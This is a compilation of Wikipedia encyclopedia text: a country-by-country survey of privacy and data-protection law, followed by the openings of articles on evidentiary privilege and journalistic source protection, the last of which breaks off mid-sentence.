Article 39. The residences of citizens of the People's Republic of China shall be inviolable. It is prohibited to illegally search or trespass into citizens' homes.

Article 40. The freedom and confidentiality of communications of citizens of the People's Republic of China are protected by law. Except where required for national security or the investigation of criminal offenses, in which case the public security organs or procuratorial organs may inspect communications in accordance with the procedures prescribed by law, no organization or individual may infringe on citizens' freedom and confidentiality of communication for any reason.

Article 1032. Natural persons enjoy the right to privacy. No organization or individual may infringe the privacy rights of others by spying, harassing, divulging, disclosing, or similar acts.

The Supreme People's Court's "Interpretation on Several Issues Concerning the Determination of Liability for Compensation for Mental Damage in Civil Torts" was adopted at the 116th meeting of the Judicial Committee of the Supreme People's Court on February 26, 2001. Under Article 3, after the death of a natural person, if a close relative suffers mental pain due to certain infringements and sues for compensation for mental damage, the people's court shall accept the case; the listed infringements include: (2) illegal disclosure or use of the privacy of the deceased, or infringement of the privacy of the deceased in other ways that violate public interests or social ethics.[citation needed]

Article 39. No organization or individual may disclose the personal privacy of minors. No organization or individual may conceal or destroy the letters, diaries, or e-mails of minors, except where inspection is needed for the investigation of crimes and is conducted by public security organs or people's procuratorates in accordance with the law, or where the letters, diaries, and e-mails belong to minors lacking capacity and are opened and read by their parents or other guardians; otherwise, no organization or individual may open or read them.

An archipelago located in the Pacific, the country of Fiji gained independence on 10 October 1970.[35] Its constitution grants the people inhabiting the land the right to privacy. The exact wording from the constitution is the following: "Every person has the right to personal privacy, which includes the right to — (a) confidentiality of their personal information; (b) confidentiality of their communications; and (c) respect for their private and family life".[35] But this same constitution provides that a law may be passed, "to the extent that it is necessary", that limits or affects the exercise of the right to privacy.
Another privacy-related law can be seen in section 54 of the Telecommunications Promulgation passed in 2008, which states that "any service provider supplying telecommunications to consumers must keep information about consumers confidential".[36] Billing information and call information are no exceptions; the only exception to this rule is for the purpose of bringing to light "fraud or bad debt". Under this law, the disclosure of information is not permitted even with the consent of the customer.[37]

Other privacy laws adopted by the country are those meant to protect the collected information, cookies, and other privacy-related matters of tourists. This concerns (but is not limited to) information collected during bookings, through the use of a company's technology or services, or when making payments. Additionally, as a member of the United Nations, Fiji is bound by the Universal Declaration of Human Rights, which states in article twelve: "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38]

France adopted a data privacy law in 1978. It applies to public and private organizations and forbids gathering sensitive data about physical persons (including data about sexuality, ethnicity, and political or religious opinions). The law is administered by the Commission nationale de l'informatique et des libertés (CNIL), a dedicated national administration.[39] As in Germany, data violations are considered criminal offenses (Art. 84 GDPR with Code pénal, Section 1, Chapitre VI, Art. 226 ff.).[40]

Germany is known as one of the first countries (in 1970) with the strictest and most detailed data privacy laws in the world. The citizens' right to protection is stated in the Constitution of Germany, in Art. 2 para. 1 and Art. 1 para. 1.[41] The data of German citizens is mainly protected from corporations under the Federal Data Protection Act (1977), most recently amended in 2009. This act specifically targets all businesses that collect information for their own use. The regulation primarily protects data within the private and personal sector, and as a member of the European Union (EU), Germany has additionally ratified the relevant act, convention, and additional protocol with the EU according to the EU Data Protection Directive 95/46/EC.

In Germany, there are two kinds of restrictions on the transfer of personal data. First, since Germany is an EU Member State, the transfer of personal data of its citizens to a nation outside the EEA is always conditional on an adequate level of data protection in the offshore country. Secondly, under German data policy rules, any transfer of personal data outside the EEA constitutes a connection to a third party, which requires a justification; that justification may be an emergency, and a provision must be met with the consent of both the receiver and the subject of the data. Note that in Germany, data transfers within a group of companies are subject to the same treatment as transfers to third parties if the destination is outside the EEA. The Federal Data Protection Commission is in charge of regulating the entirety of the enforcement of data privacy regulations for Germany.
In addition, Germany is part of the Organisation for Economic Co-operation and Development (OECD).[19] The Federal Data Protection Commission of Germany is a member of the International Conference of Data Protection and Privacy Commissioners, the European Data Protection Authorities, the EU Article 29 Working Party, and the Global Privacy Enforcement Network.[19]

Regarding the protection of children, Germany is potentially the first nation to have played an active role in banning the sharing of data within toys connected to Wi-Fi and the Internet, such as "My Friend Cayla". The body in charge of protecting the data of children is the Federal Network Agency (Bundesnetzagentur).[42] As in France, data violations are considered offenses (Art. 84 GDPR with § 42 BDSG).[43]

During the military dictatorship era, the 57 AK law prohibited taking photos of people without their permission, but the law has since been superseded. The 2472/1997 law protects the personal data of citizens, but consent for taking photos of people is not required as long as the photos are not used commercially, or are used only for personal archiving ("οικιακή χρήση" / "home use"), for publication in editorial, educational, cultural, scientific or news publications, and for fine art purposes (e.g. street photography, which the courts have upheld as legal whether done by professional or amateur photographers). However, photographing people or collecting their personal data for commercial (advertising) purposes requires their consent. The law gives photographers the right to commercially use photos of people who have not consented to the use of the images in which they appear if the depicted people have either been paid for the photo session as models (so there is no separation between editorial and commercial models in Greek law) or have paid the photographer for obtaining the photo (this, for example, gives wedding photographers the right to advertise their work using their photos of newly-wed couples they photographed in a professional capacity). In Greece the right to take photographs and publish them, or to sell licensing rights over them as fine art or editorial content, is protected by the Constitution of Greece (Article 14[44] and other articles) and by free speech laws, as well as by case law and legal cases. Photographing the police, or photographing children and publishing the photographs in a non-commercial capacity, is also legal.

In Hong Kong, the law governing the protection of personal data is principally found in the Personal Data (Privacy) Ordinance (Cap. 486), which came into force on 20 December 1996.[45] Various amendments were made to enhance the protection of individuals' personal data privacy through the Personal Data (Privacy) (Amendment) Ordinance 2012.[46] Examples of protected personal data include names, phone numbers, addresses, identity card numbers, photos, medical records and employment records. As Hong Kong remains a common law jurisdiction, judicial cases are also a source of privacy law.[47] The power of enforcement is vested in the Privacy Commissioner for Personal Data (the "Commissioner"). Non-compliance with the data protection principles set out in the ordinance does not directly constitute a criminal offense. The Commissioner may serve an enforcement notice directing the data user to remedy the contravention and/or instigate prosecution.
Contravention of an enforcement notice may result in a fine and imprisonment.[48]

India's data protection law is the Digital Personal Data Protection Act, 2023. The Right to Privacy is a fundamental right and an intrinsic part of Article 21, which protects the life and liberty of citizens, and is part of the freedoms guaranteed by Part III of the Constitution. In June 2011, India passed subordinate legislation that included various new rules applying to companies and consumers. A key aspect of the new rules required that any organization processing personal information obtain written consent from the data subjects before undertaking certain activities. However, application and enforcement of the rules remain uncertain.[49] The Aadhaar Card privacy issue became controversial when the case reached the Supreme Court.[50] The hearing in the Aadhaar case went on for 38 days across 4 months, making it the second-longest Supreme Court hearing after the landmark Kesavananda Bharati v. State of Kerala.[51]

On 24 August 2017, a nine-judge bench of the Supreme Court in Justice K. S. Puttaswamy (Retd.) and Anr. vs Union of India and Ors. unanimously held that the right to privacy is an intrinsic part of the right to life and personal liberty under Article 21 of the Constitution.[52] Previously, the Information Technology (Amendment) Act, 2008 made changes to the Information Technology Act, 2000, adding two sections relating to privacy.

Ireland is governed by the Data Protection Act 1988 along with the EU General Data Protection Regulation, which regulates the use of personal data. The DPA protects data within the private and personal sector and ensures that when data is transferred, the destination is safe and in accordance with the legislation, in order to maintain data privacy. When collecting and processing data, some of the requirements are listed below:

The Data Protection Commissioner oversees the enforcement of data privacy regulations for Ireland. All persons who collect and process data must register with the Data Protection Commissioner, unless they are exempt (non-profit organizations, journalistic, academic, or literary expression, etc.),[56] and renew their registration annually.[citation needed][57] Regarding the protection of internet property and online data, the ePrivacy Regulations 2011 protect communications and more advanced technical property and data, such as social media and the telephone.
In relation to international data privacy law in which Ireland is involved, Section 51 of the British–Irish Agreement Act 1999 sets out at length the data-security relationship between the United Kingdom and Ireland.[58] In addition, Ireland is part of the Council of Europe and the Organisation for Economic Co-operation and Development.[19] The Data Protection Commissioner of Ireland is a member of the International Conference of Data Protection and Privacy Commissioners, the European Data Protection Authorities, the EU Article 29 Working Party, the Global Privacy Enforcement Network, and the British, Irish, and Islands Data Protection Authorities.[19] Ireland is also the main international location for social media platforms, specifically LinkedIn and Twitter, for data collection and control of any data processed outside the United States.[59][60]

The Jamaican constitution grants its people the right to "respect for and protection of private and family life, and privacy of the home".[61] Although the government grants its citizens the right to privacy, the protection of this right is not strong. Among the other privacy-related laws adopted in Jamaica, the closest is the Private Security Regulation Authority Act. This act, passed in 1992, established the Private Security Regulation Authority,[62] an organization tasked with regulating the private security business and ensuring that everyone working as a private security guard is trained and certified. The goal is to ensure safer homes, communities, and businesses.[63] One reason the law was passed is that trained guards could ensure better customer service and, with the education they received, would be better equipped to deal with certain situations and to avoid actions that could be considered violations, such as invasion of privacy.[63] Additionally, as a member of the United Nations, Jamaica is bound by the Universal Declaration of Human Rights, which states in article twelve: "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38]

On 30 May 2003, Japan enacted a series of laws in the area of data protection. The two latter acts (amended in 2016) contain provisions applicable to the protection of personal information by public-sector entities.[64]

Kenya currently does not have a strong general privacy protection law for its constituents. But in Chapter Four of the constitution — the Bill of Rights — in the second part, titled "Rights and Fundamental Freedoms", privacy is allocated its own section. There the Kenyan government expresses that all its people have the right to privacy, "which includes the right not to have — (a) their person, home or property searched; (b) their possessions seized; (c) information relating to their family or private affairs unnecessarily required or revealed; or (d) the privacy of their communications infringed".[65] Although Kenya grants its people the right to privacy, there seems to be no existing document that protects these specific privacy rights. Regarding data privacy, as Alex Boniface Makulilo has observed of many African countries, Kenya's privacy laws are far from the European 'adequacy' standard.[66] As of today, Kenya does have laws that focus on specific sectors.
These include the communication and information sector, governed by the Kenya Information and Communication Act.[67] This Act makes it illegal for any licensed telecommunication operator to disclose or intercept information to which it gains access through a customer's use of the service, and it grants privacy protection in the course of using the service the company provides.[67] If a customer's information is to be provided to any third party, the customer must be made aware of the exchange and some form of agreement must be reached, even if the third party is a family member. The Act also protects Kenyans' data against fraud and other misuse. Additionally, as a member of the United Nations, Kenya is bound by the Universal Declaration of Human Rights, which states in Article 12: "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] After independence from Great Britain in 1957, Malaysia's legal system was based primarily on English common law.[68] The following common law torts are related to personal information privacy and continue to play a role in Malaysia's legal system: breach of confidence, defamation, malicious falsehood, and negligence.[68] In recent years, however, the Court of Appeal in Malaysia has referred less to English common law and looked more toward other nations with similar colonial histories and whose written constitutions are more like the Malaysian Constitution.[68] Unlike the courts in some of these other nations, such as India's Supreme Court, the Malaysian Court of Appeal has not yet recognized a constitutionally protected right to privacy.[68] In June 2010, the Malaysian Parliament passed the Personal Data Protection Act 2010, which came into effect in 2013.[69] It outlines seven Personal Data Protection Principles that entities operating in Malaysia must adhere to: the General Principle, the Notice and Choice Principle, the Disclosure Principle, the Security Principle, the Retention Principle, the Data Integrity Principle, and the Access Principle.[69] The Act defines personal data as "information in respect of commercial transactions that relates directly or indirectly to the data subject, who is identified or identifiable from that information or from that and other information".[69] A notable contribution to general privacy law is the Act's distinction between personal data and sensitive personal data, which entails different protections.[70] Personal data includes "information in respect of commercial transactions ...
that relates directly or indirectly to a data subject", while sensitive personal data includes any "personal data consisting of information as to the physical or mental health or condition of a data subject, his political opinions, his religious beliefs or other beliefs of a similar nature".[71] Although the Act does not apply to information processed outside the country, it does restrict cross-border transfers of data out of Malaysia. Additionally, the Act offers individuals the "right to access and correct the personal data held by data users", "the right to withdraw consent to the processing of personal data", and "the right to prevent data users from processing personal data for the purpose of direct marketing".[69] Punishment for violating the Personal Data Protection Act can include fines or imprisonment. Other common law and business sector-specific laws that exist in Malaysia to indirectly protect confidential information include: On 5 July 2010, Mexico enacted a new privacy package, the Federal Law on Protection of Personal Data Held by Individuals, focused on the treatment of personal data by private entities.[72] The key elements included were: In New Zealand, the Privacy Act 1993 (replaced by the Privacy Act 2020) sets out principles in relation to the collection, use, disclosure, security of, and access to personal information. The introduction into New Zealand common law of a tort covering invasion of personal privacy, at least by public disclosure of private facts, was at issue in Hosking v Runting and was accepted by the Court of Appeal. In Rogers v TVNZ Ltd, the Supreme Court indicated it had some misgivings about how the tort was introduced, but chose not to interfere with it at that stage. Complaints about privacy are considered by the Privacy Commissioner. The constitution of the Federal Republic of Nigeria offers its constituents the right to privacy as well as privacy protection: "The privacy of citizens, their homes, correspondence, telephone conversations and telegraphic communications is hereby guaranteed and protected".[73] Additionally, as a member of the United Nations, Nigeria is bound by the Universal Declaration of Human Rights, which states in Article 12: "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] Nigeria is one of the few African countries building on its privacy laws. In 2008, the Cybersecurity and Information Protection Agency Bill was passed, providing for the creation of the Cybersecurity and Information Protection Agency.[74] This agency is tasked with preventing cyberattacks and regulating the Nigerian information technology industry.[74] Additional laws have been passed that are meant to prevent the unauthorized disclosure of information and the interception of transactions, with or without ill intent.
Article III, Section 3, paragraph 1 of the 1987 Constitution of the Philippines provides that "The privacy of communication and correspondence shall be inviolable except upon lawful order of the court, or when public safety or order requires otherwise as prescribed by law".[75] Not only does the country grant Filipinos the right to privacy, it also protects that right by attaching consequences to its violation. In 2012, the Philippines passed Republic Act No. 10173, also known as the "Data Privacy Act of 2012".[76] This act extended privacy regulations and laws beyond individual industries, and it protects people's data regardless of where it is stored, whether in private spheres or not. In the same year, the cybercrime prevention law was passed; it was "intended to protect and safeguard the integrity of computer and communications systems" and prevent their misuse.[77] The Philippines has also designated agents tasked with enforcing these privacy rules and ensuring that violators are punished. Earlier laws that conflict with the provisions above have been declared void and nullified, and the country has shown its commitment to these rules by extending them to the government sphere as well. Additionally, as a member of the United Nations, the Philippines is bound by the Universal Declaration of Human Rights, which states in Article 12: "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] Applicable legislation: As a general rule, the consent of the individual is required for processing, i.e. obtaining, organizing, accumulating, holding, adjusting (updating, modifying), using, disclosing (including transferring), depersonalizing, blocking or destroying his personal data. This rule does not apply where such processing is necessary for the performance of a contract to which the individual is a party.
Singapore, like other Commonwealth jurisdictions, relies primarily on common law, and the law of confidence is employed for privacy protection cases.[78] For example, privacy can be protected indirectly through various common law torts: defamation, trespass, nuisance, negligence, and breach of confidence.[79] In February 2002, however, the Singaporean government decided that the common law approach was inadequate for its emerging globalized technological economy.[78] Thus, the National Internet Advisory Committee published the Model Data Protection Code for the Private Sector, which set standards for personal data protection and was influenced by the EU Data Protection Directive and the OECD Guidelines on the Protection of Privacy.[78] In the private sector, businesses can still choose to adopt the Model Code, but in 2005 Parliament decided that Singapore needed a more comprehensive legislative privacy framework.[80] In January 2013, Singapore's Personal Data Protection Act 2012 came into effect in three separate but related phases. The phases continued through July 2014 and dealt with the creation of the Personal Data Protection Commission, the national Do Not Call Registry, and the general data protection rules. The Act's general purpose "is to govern the collection, use and disclosure of personal data by organisations" while acknowledging the individual's right to control their personal data and organizations' legal need to collect this data.[78] It imposes eight obligations on organizations that use personal data: consent, purpose limitation, notification, access, correction, accuracy, protection/security, and retention.[81] The Act prohibits the transfer of personal data to countries with privacy protection standards lower than those outlined in the general data protection rules.[80] The Personal Data Protection Commission is responsible for enforcing the Act, relying primarily on a complaints-based system.[78] Punishments for violating the Act can include being ordered by the Commission to stop collecting and using personal data, to destroy the data, or to pay a penalty of up to $1 million.[78] Singapore has also passed various sector-specific statutes that deal more indirectly with privacy and personal information, including: There are also more specific acts for electronically stored information: The Constitution of South Africa guarantees the most general right to privacy for all its citizens, which so far provides the main protection for personal data privacy. The Protection of Personal Information Act 2013 (POPI), which focuses on data privacy and is inspired by foreign frameworks such as that of the European Union, was signed into law. POPI sets minimum requirements for the processing of personal data, such as the requirement that the data subject provide consent and that the processing serve a beneficial purpose, and it imposes stricter requirements on cross-border international transfers of personal information.[58] The recording of conversations over phone and internet is not allowed without the permission of both parties under the Regulation of Interception of Communications and Provision of Communication-related Information Act (2002). In addition, South Africa is part of the Southern African Development Community and the African Union.[19] In early 2022, Sri Lanka became the first country in South Asia to enact comprehensive data privacy legislation. The Personal Data Protection Act No.
9 of 2022, effective since 19 March 2022, applies to processing within Sri Lanka and extends extraterritorially to controllers or processors offering goods and services to individuals in Sri Lanka and/or monitoring their behavior in the country.[82] The Data Act is the world's first national data protection law; it was enacted in Sweden on 11 May 1973.[83][84][85] The law was superseded on 24 October 1998 by the Personal Data Act (Sw. Personuppgiftslagen), which implemented the 1995 EU Data Protection Directive.[86][87][88][89] The main legislation over personal data privacy for the personal and private sector in Switzerland is the Federal Data Protection Act, in force since 1992, which governs consent to the sharing of personal data, along with other legislation such as the Telecommunication Act and the Unfair Competition Act. The Act guides how data may be collected, processed, stored, used, disclosed, and destroyed. The Data Inspection Board is in charge of overseeing data breaches and privacy enforcement. Personal data must be protected against illegal use by "being processed in good faith and must be proportionate".[58] Also, the reason for a transfer of personal data must be known by the time of the transfer. Data not associated with people (not personal data) is not protected by the Data Protection Act. For data transfers to countries with unsafe data protection, the major regulations required by the Data Protection Act are: Switzerland is a white-listed country, meaning the European Commission considers it a nation with adequate levels of data protection. Switzerland is not under the EU Data Protection Directive 95/46 EC;[90] however, its data protection regulations are sufficient to meet European Union (EU) requirements without its being a member of the EU. In addition, Switzerland is part of the Council of Europe and the Organisation for Economic Cooperation and Development.[19] The Data Inspection Board of Switzerland is a member of the International Conference of Data Protection and Privacy Commissioners, European Data Protection Authorities, the EU Article 29 Working Party, and the Nordic Data Protection Authorities.[19] The right to privacy is not explicitly mentioned in the Republic of China Constitution, but it can be protected indirectly through judicial interpretation. For example, Article 12 of the Constitution states "the people shall have freedom of confidentiality of correspondence" while Article 10 states "the people shall have freedom of residence and of change of residence."[91] Along with several other articles that assert the Constitution's protection of the freedoms and rights of the people, these provisions allow the Grand Justices to decide how privacy protection fits into the legal system.[91] The Justices first referred to privacy as a protected right in the 1992 "Interpretation of Council of Grand Justices No.
293 on Disputes Concerning Debtors' Rights," but it was not directly or explicitly declared to be a right.[91] In 1995, Taiwan passed the Computer-Processed Personal Data Protection Act, which was influenced by the OECD Guidelines and enforced by each separate Ministry depending on its industry sector responsibility.[92] It only protected personal information managed by government agencies and certain industries.[70] In 2010, Taiwan enacted the Personal Data Protection Act, which laid out more comprehensive guidelines for the public and private sectors and is still enforced by individual Ministries.[92] Under the 2010 Act, personal data is protected and defined as any "data which is sufficient to, directly or indirectly, identify that person", including data such as name, date of birth, fingerprints, occupation, medical records, and financial status, among many others.[93] A few other administrative laws also deal with communication-specific personal privacy protection: Additionally, chapter 28 of the Criminal Code outlines punishments for privacy violations in article 315, sections 315-1 and 315-2. The sections primarily address issues of search and seizure and criminal punishment for wrongful invasion of privacy.[91] Finally, articles 18(I), 184(I), and 195(I) of the Taiwanese Civil Code address the "personality right" to privacy and the right to compensation when one injures the "rights" of another, such as when someone uses another's name illegally.[91] Thailand's unique history as an authoritarian buffer state during the Cold War, under the constant threat of a coup d'état, means that privacy laws have so far been limited in order to preserve national security and public safety.[94] Thailand uses bureaucratic surveillance to maintain national security and public safety, which explains the 1991 Civil Registration Act, passed to protect personal data in computerized record-keeping and data-processing done by the government.[94] The legislature passed the Official Information Act 1997 to provide basic data protection by limiting personal data collection and retention in the public sector.[92] It defines personal information in a national context in relation to state agencies.[95] Two communication technology related laws, the Electronic Transactions Act 2001 and the Computer Crime Act 2007, provide some data privacy protection and enforcement mechanisms.[94] Nevertheless, Thailand still lacks legislation that explicitly addresses privacy security.[94] Thus, with the need for a more general and all-encompassing data protection law, the legislature proposed the Personal Data Protection Bill in 2013, heavily influenced by the OECD Guidelines and the EU Directive.[94][95] The draft law is still under evaluation and its enactment date is not yet finalized.[95] Privacy and data protection in Ukraine is mainly regulated by the Law of Ukraine No. 2297-VI 'On Personal Data Protection', enacted on 1 June 2010.[96] On 20 December 2012 the legislation was substantially amended. Some general and sector-specific aspects of privacy are regulated by the following acts:[97] As a member of the European Convention on Human Rights, the United Kingdom adheres to Article 8 of the European Convention on Human Rights, which guarantees a "right to respect for privacy and family life" from state parties, subject to restrictions as prescribed by law and necessary in a democratic society towards a legitimate aim. However, there is no independent tort law doctrine which recognises a right to privacy.
This has been confirmed on a number of occasions. Processing of personal information is regulated by the Data Protection Act 2018, supplementing the EU General Data Protection Regulation, which is still in force (in amended form) after the UK's exit from the EU as "retained EU legislation". The Data Protection Act 2018 is the United Kingdom's main legislation protecting personal data and governing how it should be collected, processed, stored and shared. In accordance with this legislation, citizens have rights such as the right to access their personal data and the right to request that their data be deleted under certain circumstances, also known as the "right to be forgotten". The Act also sets out obligations for organizations that handle personal data, including requirements for transparency in data processing, the implementation of appropriate security measures to protect data, and the need for consent from individuals before processing their data. The Privacy and Electronic Communications Regulations, established in 2003, gave citizens control over consent and disclosure of information in specific electronic communications, including: The goal of the Privacy and Electronic Communications Regulations is to protect individuals' privacy and control over their electronic communications while promoting responsible and transparent practices by organizations that engage in electronic marketing and in the use of tracking technologies.[98] The United Kingdom General Data Protection Regulation is the domestic version of the European Union's General Data Protection Regulation (GDPR), implemented into UK law through the Data Protection Act 2018; it came into effect alongside the EU GDPR in May 2018. The UK GDPR governs data protection and privacy within the UK, applying to the processing of personal data by organizations operating within the UK, and includes specific provisions tailored to the UK's legal framework and requirements. Key aspects of the UK GDPR include:[99] The UK GDPR aims to ensure that personal data is processed legally, fairly and with full transparency while individuals are given control over the handling of their personal data. For detailed guidance and the latest updates on compliance with United Kingdom privacy laws, businesses and individuals can refer to resources provided by the Information Commissioner's Office (https://ico.org.uk/) and stay informed about developments in UK privacy law through expert analyses and updates.[99] In the United States, the right to privacy is not explicitly stated anywhere in the Bill of Rights, but it was in the United States that the idea of a right to privacy was first addressed within a legal context. Louis Brandeis (later a Supreme Court justice) and another young lawyer, Samuel D. Warren II, published an article called "The Right to Privacy" in the Harvard Law Review in 1890, arguing that the United States Constitution and common law allowed for the deduction of a general "right to privacy".[100] Their project was never entirely successful, and the renowned tort expert and Dean of the School of Law at the University of California, Berkeley, William Lloyd Prosser, argued in 1960 that "privacy" was composed of four separate torts, the only unifying element of which was a (vague) "right to be left alone".[101] The four torts were intrusion upon seclusion, public disclosure of private facts, false light, and appropriation of name or likeness.[106] Public Disclosure of Private Facts, or Publicity Given to Private Life, is a tort under privacy law that protects individuals from the unauthorized dissemination of private information that is not of public concern.
This tort aims to safeguard an individual's right to privacy and prevent unwarranted intrusion into their personal lives.[107] To establish a claim for public disclosure of private facts, the following elements generally need to be proven: (1) a public disclosure (2) of private facts (3) that would be highly offensive to a reasonable person and (4) that are not of legitimate public concern. One of the central privacy policies concerning minors is the Children's Online Privacy Protection Act (COPPA), which requires children under the age of thirteen to gain parental consent before putting any personal information online.[108] The Privacy Act of 1974 is foundational, establishing a code of fair information practices that governs the collection, maintenance, use, and dissemination of information about individuals that is maintained in systems of records by federal agencies. This act allows individuals to review and amend their records, ensuring personal information is handled transparently and responsibly by the government.[109] Enacted in 1996, the Health Insurance Portability and Accountability Act (HIPAA) protects sensitive patient health information from being disclosed without the patient's consent or knowledge. HIPAA sets the standard for protecting sensitive patient data held by health care providers, insurance companies, and their business associates.[110] The Federal Trade Commission plays a crucial role in enforcing federal privacy laws that protect consumer privacy and security, particularly in commercial practices. It oversees the enforcement of laws such as the Fair Credit Reporting Act, which regulates the collection and use of consumer credit information.[111] Individual states also enact their own privacy laws. The California Consumer Privacy Act is one of the most stringent privacy laws in the U.S. It provides California residents with the right to know about the personal data collected about them, the right to delete personal information held by businesses, and the right to opt out of the sale of their personal information. Businesses must disclose their data collection and sharing practices to consumers and allow consumers to access their data and opt out if they choose. The Act was expanded in 2023, providing citizens the right to limit the collection of their data and to correct false information.[112] Enforcement of these laws is specific to the statutes and the authorities responsible. For instance, HIPAA violations can lead to substantial fines imposed by the Department of Health and Human Services, while the Federal Trade Commission handles penalties under consumer protection laws. State laws are enforced by the respective state attorneys general or designated state agencies. Privacy laws in the U.S. reflect a complex landscape shaped by sector-specific requirements and state-level variations, illustrating the challenge of protecting privacy in a federated system of government. For additional information on privacy laws in the United States, see: Recently, a handful of lists and databases have emerged to help risk managers research U.S. state and federal laws that define liability.
They include: To be able to intrude on someone's seclusion, the person must have a "legitimate expectation of privacy" in the physical place or personal affairs intruded upon.[4] To be successful, a plaintiff "must show the defendant penetrated some zone of physical or sensory privacy" or "obtained unwanted access to data" in which the plaintiff had "an objectively reasonable expectation of seclusion or solitude in the place, conversation or data source".[5] For example, a delicatessen employee privately told co-workers that she had a staph infection.[4] The co-workers then informed their manager, who directly contacted the employee's doctor to determine whether she actually had a staph infection, because employees in Arkansas with a communicable disease are forbidden from working in the food preparation industry due to transmission concerns.[4] The employee sued her employer, the deli, for intruding on her private affairs, as the information she had previously shared had been leaked.[4] The court held that the deli manager had not intruded upon the worker's private affairs, because the worker had made her staph infection public by telling her two co-workers about it, so the inquiry was no longer an intrusion.[4] The court said: "When Fletcher learned that she had a staph infection, she informed two coworkers of her condition. Fletcher's revelation of private information to coworkers eliminated Fletcher's expectation of privacy by making what was formerly private a topic of office conversation."[4] In determining whether an intrusion is objectively "highly offensive," a court is supposed to examine "all the circumstances of an intrusion, including the motives or justification of the intruder".[118] It is thus up to the courts to decide whether otherwise "offensive" conduct is acceptable, based on the intruder's motives in pursuing a particular story. A website may commit a "highly offensive" act by collecting information from website visitors using "duplicitous tactics", but a website that violates its own privacy policy does not automatically commit a highly offensive act. The Third Circuit Court of Appeals, however, has held that Viacom's data collection on the Nickelodeon website was highly offensive because the privacy policy may have deceptively caused parents to allow their young children to use Nick.com, thinking it was not collecting their personal information.[119] The First Amendment "does not immunize the press from torts or crimes committed in an effort to gather news"; journalists are still held liable for the news they gather and how they gather it. But the press is given more latitude to intrude on seclusion to gather important information, so many actions that would be considered "highly offensive"[120] if performed by a private citizen may not be considered offensive if performed by a journalist in the "pursuit of a socially or politically important story".[121] In California, the California Consumer Privacy Act of 2018 provides specific regulations for companies collecting consumer data in California, organized as particular rights; these include the right to know how companies intend to use consumer data, as well as the right to opt out of its collection and potentially to delete this data.
Though the right to privacy exists in several regulations in Uzbekistan, the most effective privacy protections come in the form of its constitutional articles, and different aspects of the right to privacy are protected in different ways depending on the situation. Vietnam, lacking a general data protection law, relies on Civil Code regulations relating to personal data protection. Specifically, the Code "protects information relating to the private life of a person".[123] The 2006 Law on Information Technology protects personal information, such as name, profession, phone number, and email address, and declares that organizations may only use this information for a "proper purpose"; the legislation, however, does not define what qualifies as proper.[123] The 2005 Law on Electronic Transactions protects personal information during electronic transactions by prohibiting organizations and individuals from disclosing "part or all of information related to private and personal affairs ... without prior agreement".[124] The 2010 Law on Protection of Consumers' Rights provides further protection for consumer information, but it does not define the scope of that information or create a data protection authority; additionally, it is only applicable in the private sector.[92] In 2015, the Vietnamese legislature introduced the Law on Information Security, which ensures better information safety and protection online and in users' computer software. It took effect on 1 July 2016 and is Vietnam's first overarching data protection legislation.[125]
https://en.wikipedia.org/wiki/Privacy_law
In the law of evidence, a privilege is a rule of evidence that allows the holder of the privilege to refuse to disclose information or provide evidence about a certain subject, or to bar such evidence from being disclosed or used in a judicial or other proceeding. There are many such privileges recognised by the judicial system, some stemming from the common law and others from statute law. Each privilege has its own rules, which often vary between jurisdictions. One well-known privilege is the solicitor–client privilege, referred to as the attorney–client privilege in the United States and as the legal professional privilege in Australia. This protects confidential communications between a client and his or her legal adviser for the dominant purpose of legal advice.[1] The rationale is that clients ought to be able to communicate freely with their lawyers, in order to facilitate the proper functioning of the legal system. Other common forms include privilege against compelled self-incrimination (in other proceedings), without prejudice privilege (protecting communications made in the course of negotiations to settle a legal dispute), public interest privilege (formerly Crown privilege, protecting documents for which secrecy is necessary for the proper functioning of government), spousal (marital) privilege, medical professional privilege, and clergy–penitent privilege. In the US, several states have enacted the Uniform Mediation Act (UMA), which specifies a mediator's privilege with regard to state procedures. In the UK, "mediation privilege" is generally protected, although in the case of Ruttle Plant Hire v DEFRA (2007), an action brought to set aside a settlement agreement on the grounds that it was entered into under economic duress, there was a call for the mediator to give evidence on her recollection of the mediation process.[2] In the United Kingdom, the Rehabilitation of Offenders Act 1974 provides that evidence relating to spent convictions (those in respect of which the Act says the convicted person is rehabilitated, generally older and less serious ones) is inadmissible, and provides privilege against answering questions relating to such convictions, although some exceptions apply, in particular in criminal proceedings.[3] The effect of the privilege is usually a right on the part of a party or witness to a case, allowing them to refuse to produce evidence, in the form of documents or testimony, from the person entitled to the privilege. For example, a person can generally prevent their attorney from testifying about the legal relationship between attorney and client, even if the attorney were willing to do so; in this case, the privilege belongs to the client and not the attorney. In a few instances, such as the marital privilege, the privilege is a right held by the potential witness. Thus, if a wife wishes to testify against her husband, she may do so even if he opposes this testimony; however, the wife has the privilege of refusing to testify even if the husband wishes her to do so. On the other hand, the person entitled to a privilege is at liberty to waive the privilege.
https://en.wikipedia.org/wiki/Privilege_(evidence)
Source protection, sometimes also referred to as source confidentiality or, in the U.S., as the reporter's privilege, is a right accorded to journalists under the laws of many countries, as well as under international law. It prohibits authorities, including the courts, from compelling a journalist to reveal the identity of an anonymous source for a story. The right is based on a recognition that without a strong guarantee of anonymity, many would be deterred from coming forward and sharing information of public interest with journalists. Regardless of whether the right to source confidentiality is protected by law, the process of communicating between journalists and sources can jeopardize the privacy and safety of sources, as third parties can hack electronic communications or otherwise spy on interactions between journalists and sources. News media and their sources have expressed concern over governments covertly accessing their private communications.[1] To mitigate these risks, journalists and sources often rely on encrypted messaging. Journalists rely on source protection to gather and reveal information in the public interest from confidential sources. Such sources may require anonymity to protect them from physical, economic or professional reprisals in response to their revelations. There is a strong tradition of legal source protection internationally, in recognition of the function that confidential sources play in facilitating 'watchdog' or 'accountability' journalism. While professional journalistic practice entails multi-sourcing, verification and corroboration, confidential sources are a key component of this practice. Without confidential sources, many acts of investigative story-telling—from Watergate to the major 2014 investigative journalism project Offshore Leaks undertaken by the International Consortium of Investigative Journalists (ICIJ)[2]—may never have surfaced. Even 